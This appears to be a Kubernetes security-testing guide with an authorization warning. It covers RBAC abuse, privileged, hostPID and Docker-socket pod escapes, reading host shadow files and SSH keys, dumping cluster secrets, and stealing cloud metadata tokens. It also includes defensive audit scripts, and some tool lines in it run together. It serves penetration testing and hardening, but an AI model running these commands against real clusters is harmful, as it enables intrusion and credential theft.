Container Security
Kubernetes Security Testing
Container orchestration security assessment covering cluster misconfigurations, RBAC exploitation, pod escapes, and lateral movement in Kubernetes environments.
Authorization Required
Only test Kubernetes clusters you own or have explicit written authorization to test.
Unauthorized access to computer systems, including cloud and cluster infrastructure, is a criminal offence in most jurisdictions (in the United States under the Computer Fraud and Abuse Act).
Reconnaissance
Container Detection
bash
# Check if running inside a container
cat /proc/1/cgroup            # "docker", "kubepods" or a pod UID in the path; on cgroup v2 this often shows only "0::/"
ls -la /.dockerenv            # Docker; podman and CRI-O use /run/.containerenv instead
hostname                      # Kubernetes sets the hostname to the pod name
# Service account token location (absent when the pod sets automountServiceAccountToken: false)
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
# Environment variables: KUBERNETES_SERVICE_HOST/PORT plus <SERVICE>_SERVICE_HOST for every service in the namespace
env | grep -i kube
API Server Access
bash
# Set up API access from inside pod
APISERVER=https://kubernetes.default.svc
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# Test API access (200 with a version list for any authenticated token; 401 means the token was rejected)
curl -s --cacert $CACERT --header "Authorization: Bearer $TOKEN" $APISERVER/api/
# List pods in current namespace (403 Forbidden means the token is valid but RBAC denies the verb)
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
curl -s --cacert $CACERT --header "Authorization: Bearer $TOKEN" $APISERVER/api/v1/namespaces/$NAMESPACE/pods
# Ask the API what this token may do in the namespace (the same data kubectl auth can-i --list reports)
curl -s --cacert $CACERT --header "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
  -X POST $APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
  -d "{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"spec\":{\"namespace\":\"$NAMESPACE\"}}"
External Enumeration
bash
# Scan for exposed API servers and node agents
nmap -p 2379,2380,6443,8443,10250,10255,10256,30000-32767 -sV target.com
# Common K8s ports:
# 6443 (8443 on some distributions) - API Server (TLS)
# 10250 - Kubelet API (TLS; authentication and authorization are configurable, anonymous may be enabled)
# 10255 - Kubelet read-only HTTP port (deprecated, disabled by default)
# 10256 - kube-proxy health endpoint
# 2379/2380 - etcd client/peer; etcd holds every Secret in plaintext unless encryption at rest is configured
# 30000-32767 - NodePort services
# Test unauthenticated kubelet API: 401 = anonymous auth off, 403 = anonymous on but not authorized,
# a JSON pod list = anonymous read access (finding)
curl -sk https://target.com:10250/pods
RBAC Exploitation
Permission Enumeration
bash
# Check current permissions (for the identity in the current kubeconfig or the mounted SA token)
kubectl auth can-i --list
kubectl auth can-i --list -n kube-system        # permissions differ per namespace
# Check specific permissions
kubectl auth can-i create pods
kubectl auth can-i get secrets
kubectl auth can-i create deployments
kubectl auth can-i create pods --subresource=exec   # subresources need their own grant
# List service accounts
kubectl get serviceaccounts --all-namespaces
# List roles and bindings (bindings show who actually holds a role)
kubectl get roles,rolebindings --all-namespaces
kubectl get clusterroles,clusterrolebindings
Dangerous RBAC Permissions
| Permission | Risk | Exploitation Path |
|---|---|---|
| create pods | High | Spawn a privileged or hostPath pod; mount any service account token in the namespace |
| get/list secrets | Critical | Read credentials and service account tokens |
| create pods/exec | High | Command execution in running pods |
| create rolebindings/clusterrolebindings, or bind/escalate on roles | Critical | Grant yourself a more powerful role |
| impersonate users/groups/serviceaccounts | Critical | Act as cluster-admin or any other identity |
| get/create nodes/proxy | High | Reach the kubelet API on every node through the API server |
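The table lists grants one at a time, but real roles arrive as JSON with wildcards, and a wildcard or a `pods/*` entry grants the dangerous verbs without ever naming them. The script below is an added example written for this page (it is not from the original page or from any of the tools listed later): it reads the output of `kubectl get clusterroles,roles --all-namespaces -o json`, applies the RBAC matching rules (`*` matches any group, resource or verb; a subresource such as `pods/exec` must be named explicitly or via `pods/*`) and reports which of the grants from the table each role carries. The role objects at the bottom are constructed for the example.

```python
"""Added example: flag dangerous grants in Role/ClusterRole objects.

Input is the JSON kubectl prints for
    kubectl get clusterroles,roles --all-namespaces -o json
The SAMPLE document below is constructed and trimmed to the fields used.
"""
import json

RBAC = "rbac.authorization.k8s.io"
# (apiGroup, resource, verb) -> why it matters; "" is the core API group.
DANGEROUS = {
    ("", "secrets", "get"): "read credentials and service account tokens",
    ("", "secrets", "list"): "list returns full secret contents, not just names",
    ("", "pods", "create"): "run a privileged/hostPath pod or mount any SA token in the namespace",
    ("", "pods/exec", "create"): "command execution in running pods",
    (RBAC, "rolebindings", "create"): "bind a stronger role to yourself",
    (RBAC, "clusterrolebindings", "create"): "bind cluster-admin to yourself",
    (RBAC, "roles", "escalate"): "create roles with permissions you do not hold",
    (RBAC, "clusterroles", "bind"): "bind roles whose permissions you do not hold",
    ("", "users", "impersonate"): "act as any user, including cluster admins",
    ("", "groups", "impersonate"): "act as any group, e.g. system:masters",
    ("", "serviceaccounts", "impersonate"): "act as any service account",
    ("", "nodes/proxy", "get"): "reach every kubelet API through the API server",
}


def rule_grants(wanted, granted, subresource_aware=False):
    """True if a rule's list grants `wanted`, honouring RBAC wildcards.

    "pods" does not imply "pods/exec"; only "pods/exec", "pods/*" or "*" do.
    """
    if "*" in granted or wanted in granted:
        return True
    if subresource_aware and "/" in wanted:
        return wanted.split("/")[0] + "/*" in granted
    return False


def dangerous_grants(role):
    """Return [(verb, resource, reason)] for one Role or ClusterRole object."""
    hits = []
    for rule in role.get("rules", []):
        groups = rule.get("apiGroups", [])
        resources = rule.get("resources", [])
        verbs = rule.get("verbs", [])
        for (group, resource, verb), reason in DANGEROUS.items():
            if (rule_grants(group, groups)
                    and rule_grants(resource, resources, subresource_aware=True)
                    and rule_grants(verb, verbs)):
                hits.append((verb, resource, reason))
    return hits


def scan_roles(role_list):
    """Map "Kind/namespace/name" -> hits for a kubectl List document."""
    report = {}
    for role in role_list.get("items", []):
        meta = role["metadata"]
        key = f"{role['kind']}/{meta.get('namespace', '')}/{meta['name']}"
        hits = dangerous_grants(role)
        if hits:
            report[key] = hits
    return report


# Constructed sample: a harmless reader, a deployer with exec and secret access,
# and a CI role with the classic full wildcard.
SAMPLE = {
    "kind": "List",
    "items": [
        {"kind": "Role", "metadata": {"namespace": "web", "name": "pod-reader"},
         "rules": [{"apiGroups": [""], "resources": ["pods", "pods/log"],
                    "verbs": ["get", "list", "watch"]}]},
        {"kind": "Role", "metadata": {"namespace": "web", "name": "deployer"},
         "rules": [{"apiGroups": [""], "resources": ["pods", "pods/exec"],
                    "verbs": ["create", "get"]},
                   {"apiGroups": [""], "resources": ["secrets"], "verbs": ["get"]}]},
        {"kind": "ClusterRole", "metadata": {"name": "ci-runner"},
         "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    ],
}

if __name__ == "__main__":
    import sys
    # Pipe real kubectl output in, or run without stdin to see the sample.
    doc = json.load(sys.stdin) if not sys.stdin.isatty() else SAMPLE
    for key, hits in scan_roles(doc).items():
        print(key)
        for verb, resource, reason in hits:
            print(f"  {verb} {resource}: {reason}")
```

A role alone does not say who holds it; join the report with `kubectl get rolebindings,clusterrolebindings -A -o json` (or use `kubectl who-can`, listed under Tools) before calling anything a finding.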
Pod Escape Techniques
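Each escape in this section has a precondition: a full capability set, a shared host PID namespace, or a runtime socket mounted from the node. The script below is an added example written for this page (not code from the original page) that checks those preconditions from both vantage points a tester has: inside the container it decodes the `CapEff` line of `/proc/self/status` into capability names, and from outside, given `kubectl get pod NAME -o json`, it audits the pod spec for privileged mode, `hostPID`/`hostNetwork`/`hostIPC`, added escape-relevant capabilities and `hostPath` mounts of the node root, runtime sockets or kubelet state. The status text and pod object are constructed, and the list of "sensitive" host paths is this example's own choice.

```python
"""Added example: check pod-escape preconditions from /proc status text or a pod spec.

SAMPLE_STATUS and SAMPLE_POD below are constructed, not captured from a cluster.
"""
import os

# Linux capability names by bit number; CAP_CHECKPOINT_RESTORE (40) is the last on current kernels.
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID",
    "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE",
    "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW",
    "CAP_IPC_LOCK", "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT",
    "CAP_SYS_PTRACE", "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE",
    "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE",
    "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ",
    "CAP_PERFMON", "CAP_BPF", "CAP_CHECKPOINT_RESTORE",
]
# Capabilities that by themselves open an escape path (mount/cgroup tricks, ptrace, modules, raw disk).
ESCAPE_CAPS = {"CAP_SYS_ADMIN", "CAP_SYS_PTRACE", "CAP_SYS_MODULE", "CAP_DAC_READ_SEARCH", "CAP_SYS_RAWIO"}
# hostPath prefixes that hand over the node (this example's own list).
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/run/docker.sock", "/run/containerd",
                        "/var/run/crio", "/var/lib/kubelet", "/proc", "/sys", "/dev")


def decode_capeff(hex_mask):
    """'0000003fffffffff' -> names of every set bit."""
    mask = int(hex_mask, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1]


def escape_caps(hex_mask):
    """The escape-relevant subset of a CapEff mask."""
    return sorted(set(decode_capeff(hex_mask)) & ESCAPE_CAPS)


def capeff_from_status(status_text):
    """Pull the CapEff hex mask out of /proc/<pid>/status text."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return line.split()[1]
    raise ValueError("no CapEff line in status text")


def is_sensitive_host_path(path):
    path = os.path.normpath(path)
    if path == "/":
        return True
    return any(path == p or path.startswith(p + "/") for p in SENSITIVE_HOST_PATHS if p != "/")


def audit_pod(pod):
    """Return a sorted list of finding codes for one pod object."""
    spec = pod["spec"]
    findings = set()
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            findings.add(flag)
    volumes = {v["name"]: v for v in spec.get("volumes", [])}
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            findings.add(f"privileged:{c['name']}")
        for cap in (sc.get("capabilities") or {}).get("add") or []:
            name = cap.upper()
            name = name if name.startswith("CAP_") else "CAP_" + name
            if name in ESCAPE_CAPS or cap.upper() == "ALL":
                findings.add(f"cap:{name}:{c['name']}")
        for mount in c.get("volumeMounts", []):
            host_path = (volumes.get(mount["name"], {}).get("hostPath") or {}).get("path")
            if host_path and is_sensitive_host_path(host_path):
                findings.add(f"hostPath:{host_path}:{c['name']}")
    return sorted(findings)


# Constructed inputs: a status excerpt from a privileged container and a "debug" pod
# that combines hostPID, privileged mode and a docker.sock mount.
SAMPLE_STATUS = ("Name:\tbash\nUid:\t0\t0\t0\t0\nCapInh:\t0000000000000000\n"
                 "CapPrm:\t0000003fffffffff\nCapEff:\t0000003fffffffff\nCapBnd:\t0000003fffffffff\n")
DOCKER_DEFAULT = "00000000a80425fb"   # default Docker/containerd capability set
SAMPLE_POD = {
    "kind": "Pod", "metadata": {"name": "node-debug", "namespace": "ops"},
    "spec": {
        "hostPID": True,
        "volumes": [{"name": "dockersock", "hostPath": {"path": "/var/run/docker.sock"}},
                    {"name": "logs", "hostPath": {"path": "/var/log/app"}}],
        "containers": [{
            "name": "debug", "image": "alpine",
            "securityContext": {"privileged": True, "capabilities": {"add": ["SYS_PTRACE"]}},
            "volumeMounts": [{"name": "dockersock", "mountPath": "/var/run/docker.sock"},
                             {"name": "logs", "mountPath": "/logs"}]}],
    },
}

if __name__ == "__main__":
    mask = capeff_from_status(SAMPLE_STATUS)
    print(f"CapEff {mask}: {len(decode_capeff(mask))} caps, escape-relevant: {escape_caps(mask)}")
    print(f"Docker default {DOCKER_DEFAULT}: escape-relevant: {escape_caps(DOCKER_DEFAULT)}")
    print("pod findings:", audit_pod(SAMPLE_POD))
```

Inside a real container, feed it `open("/proc/self/status").read()`; `0000003fffffffff` decodes to 38 capabilities (the full set on kernels before 5.8, which added CAP_PERFMON, CAP_BPF and CAP_CHECKPOINT_RESTORE; newer kernels show `000001ffffffffff`), while the Docker default mask decodes to 14 capabilities with none of the escape-relevant ones.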
Privileged Container Escape
bash
# Check if running as privileged: inspect the effective capability mask
grep CapEff /proc/self/status
# CapEff: 0000003fffffffff = every capability on kernels before 5.8 (000001ffffffffff on newer kernels)
# CapEff: 00000000a80425fb = the default Docker/containerd set; CAP_SYS_ADMIN is bit 21
capsh --decode=0000003fffffffff   # name the bits, if capsh is available
# Mount host filesystem (privileged containers see the node's block devices; find the root device first)
lsblk   # or: fdisk -l
mkdir /mnt/host
mount /dev/sda1 /mnt/host
# Access host files
cat /mnt/host/etc/shadow
cat /mnt/host/root/.ssh/id_rsa
# Escape to host via nsenter. PID 1 must be the node's init, so this needs hostPID: true as well as
# privileges; in a privileged pod without hostPID, PID 1 is the container's own entrypoint
nsenter --target 1 --mount --uts --ipc --net --pid -- bash
Host PID Namespace Escape
bash
# If hostPID: true is set, the container shares the node's PID namespace
ps aux # See host processes, including the kubelet and other pods' entrypoints
cat /proc/*/cmdline | tr '\0' ' ' | grep -i -e token -e password   # credentials passed as arguments
# Read host files through a host process's root symlink. This is subject to ptrace access checks:
# it works reliably when the container is privileged or holds CAP_SYS_PTRACE and no LSM profile blocks it
cat /proc/1/root/etc/shadow
# Access host filesystem via /proc
ls -la /proc/1/root/
# Copy files from host
cp /proc/1/root/etc/passwd /tmp/passwd
Docker Socket Escape
bash
# Check for mounted container runtime sockets
ls -la /var/run/docker.sock /run/containerd/containerd.sock /var/run/crio/crio.sock 2>/dev/null
# If docker.sock is present, spawn a privileged container that chroots into the node's root filesystem
docker run -it --privileged --pid=host --net=host -v /:/host alpine chroot /host
# Without a docker client, the socket still speaks the Docker HTTP API
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json
Credential Harvesting
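The commands in this section decode one secret at a time, and grepping the raw `-o json` output misses values entirely because everything under `.data` is base64. The script below is an added example written for this page (not from the original page): it takes the output of `kubectl get secrets --all-namespaces -o json`, decodes every value, and flags credential shapes (AWS access key IDs, PEM private keys, JWTs such as service account tokens, GCP service-account JSON, registry auth blobs) as well as key names that usually hold a credential. The secret objects are constructed; the AWS key is the placeholder `AKIAIOSFODNN7EXAMPLE` from AWS's own documentation, and the pattern and key-hint lists are this example's choices.

```python
"""Added example: decode and search kubectl's JSON listing of Secrets.

The SAMPLE document below is constructed; values are base64 as the API returns them.
"""
import base64
import json
import re

# Value patterns worth flagging regardless of the key name.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]{10,}\.eyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]+"),
    "gcp_service_account_json": re.compile(r'"type"\s*:\s*"service_account"'),
    "registry_auth": re.compile(r'"auths"\s*:'),
}
# Key names that usually hold a credential even when the value has no recognisable shape.
KEY_HINTS = ("password", "passwd", "secret", "token", "api_key", "apikey", "access_key")


def decode_secret(secret):
    """Return {key: decoded text} for one Secret; binary values are summarised."""
    decoded = {}
    for key, value in (secret.get("data") or {}).items():
        raw = base64.b64decode(value)
        try:
            decoded[key] = raw.decode("utf-8")
        except UnicodeDecodeError:
            decoded[key] = f"<{len(raw)} binary bytes>"
    return decoded


def scan_secrets(secret_list):
    """Return [(namespace, name, key, label)] for a kubectl List of Secrets."""
    findings = []
    for secret in secret_list.get("items", []):
        ns = secret["metadata"].get("namespace", "")
        name = secret["metadata"]["name"]
        for key, text in decode_secret(secret).items():
            for label, pattern in PATTERNS.items():
                if pattern.search(text):
                    findings.append((ns, name, key, label))
            if any(hint in key.lower() for hint in KEY_HINTS):
                findings.append((ns, name, key, "credential_key_name"))
    return findings


def raw_grep(secret_list, needle):
    """What `kubectl get secrets -A -o json | grep -i needle` sees: the undecoded JSON."""
    return needle.lower() in json.dumps(secret_list).lower()


def b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed sample: cloud keys, a TLS pair, an Opaque secret holding a JWT-shaped token,
# and a config secret with nothing sensitive (one value is binary).
SAMPLE = {
    "kind": "List",
    "items": [
        {"metadata": {"namespace": "prod", "name": "cloud-creds"}, "type": "Opaque",
         "data": {"AWS_ACCESS_KEY_ID": b64("AKIAIOSFODNN7EXAMPLE"),
                  "AWS_SECRET_ACCESS_KEY": b64("constructed-secret-value")}},
        {"metadata": {"namespace": "prod", "name": "ingress-tls"}, "type": "kubernetes.io/tls",
         "data": {"tls.crt": b64("-----BEGIN CERTIFICATE-----\nMIIB...constructed\n-----END CERTIFICATE-----"),
                  "tls.key": b64("-----BEGIN RSA PRIVATE KEY-----\nMIIE...constructed\n-----END RSA PRIVATE KEY-----")}},
        {"metadata": {"namespace": "ci", "name": "runner-token"}, "type": "Opaque",
         "data": {"token": b64("eyJhbGciOiJSUzI1NiIsImtpZCI6ImMifQ."
                               "eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50In0.c2lnbmF0dXJl")}},
        {"metadata": {"namespace": "web", "name": "app-config"}, "type": "Opaque",
         "data": {"LOG_LEVEL": b64("info"), "blob": base64.b64encode(b"\x00\xff\xfe\x01").decode()}},
    ],
}

if __name__ == "__main__":
    import sys
    # Pipe real kubectl output in, or run without stdin to see the sample.
    doc = json.load(sys.stdin) if not sys.stdin.isatty() else SAMPLE
    print("grep for AKIA on raw JSON:", raw_grep(doc, "AKIA"))
    for ns, name, key, label in scan_secrets(doc):
        print(f"{ns}/{name} {key}: {label}")
```

On the sample, `raw_grep(SAMPLE, "AKIA")` is false while the scan reports the access key, which is exactly why `grep -i aws` on raw output only ever matches key and secret names.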
Secret Extraction
bash
# List all secrets
kubectl get secrets --all-namespaces
# Decode secret (.data values are base64-encoded)
kubectl get secret mysecret -o jsonpath='{.data.password}' | base64 -d
# Get all secrets in JSON
kubectl get secrets -o json
# Search for cloud credentials. Note: grep on the raw JSON only matches key and secret names,
# because the values are base64-encoded; decode them before searching values
kubectl get secrets --all-namespaces -o json | grep -i aws
kubectl get secrets --all-namespaces -o json \
  | jq -r '.items[] | "\(.metadata.namespace)/\(.metadata.name) " + (.data // {} | to_entries[] | "\(.key)=\(.value|@base64d)")' \
  | grep -i aws
Cloud Metadata Service
bash
# AWS IMDS (blocked if the node enforces IMDSv2 with a hop limit of 1, or a NetworkPolicy/proxy filters 169.254.169.254)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# AWS IMDSv2 (a session token is required when IMDSv1 is disabled)
IMDS_TOKEN=$(curl -s -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Azure IMDS (instance metadata, and a managed identity token if one is assigned to the node)
curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# GCP Metadata (the node service account's access token; GKE Workload Identity replaces this with a per-pod identity)
curl -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/
curl -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
Lateral Movement
bash
# List all pods with IPs and the nodes they run on
kubectl get pods --all-namespaces -o wide
# Exec into another pod (needs create pods/exec in that namespace)
kubectl exec -it target-pod -n target-namespace -- /bin/bash
# Port forward to service
kubectl port-forward service/database 5432:5432
# Access internal services by DNS from any pod (without NetworkPolicy, every pod can reach every service)
curl http://internal-service.namespace.svc.cluster.local
Common Misconfigurations
Anonymous API Access
bash
# Test anonymous access (no token)
curl -k https://API_SERVER:6443/api/
# Expected: 403 Forbidden for system:anonymous, or 401 if --anonymous-auth=false.
# A 200 with an API listing means anonymous has been granted RBAC permissions (misconfiguration).
# /version and /healthz are readable anonymously by default and are not a finding on their own.
Exposed Kubelet
bash
# Anonymous kubelet (pod specs including env vars and mounts; /runningpods/ for the running set)
curl -k https://NODE:10250/pods
curl -k https://NODE:10250/runningpods/
Exposed etcd
bash
# Unauthenticated etcd (v3 API; every Kubernetes object lives under /registry, Secrets under /registry/secrets)
ETCDCTL_API=3 etcdctl --endpoints=http://ETCD:2379 get / --prefix --keys-only
ETCDCTL_API=3 etcdctl --endpoints=http://ETCD:2379 get /registry/secrets --prefix --keys-only
Default Namespace Usage
bash
# All workloads in default namespace (a sign that namespaces, RBAC scoping and NetworkPolicy are not in use)
kubectl get all -n default
Tools
kube-hunter
Hunt for security weaknesses in K8s clusters.
bash
pip install kube-hunter
kube-hunter --remote CLUSTER_IP
kubeaudit
Audit K8s clusters for security concerns.
bash
brew install kubeaudit
kubeaudit all
kubeaudit all -f deployment.yaml   # audit manifests before they reach the cluster
peirates
K8s penetration testing tool.
bash
go install github.com/inguardians/peirates@latestkubeletctl
Interact with kubelet API.
bash
go install github.com/cyberark/kubeletctl@latest bash
# Trivy - Container vulnerability scanner
trivy image nginx:latest
trivy k8s --report=summary
# rbac-tool - RBAC visualization (krew plugin: kubectl krew install rbac-tool)
kubectl rbac-tool viz --outformat dot
kubectl rbac-tool who-can get secrets
# kubectl-who-can (krew plugin: kubectl krew install who-can) - joins roles with their bindings
kubectl who-can create pods
kubectl who-can get secrets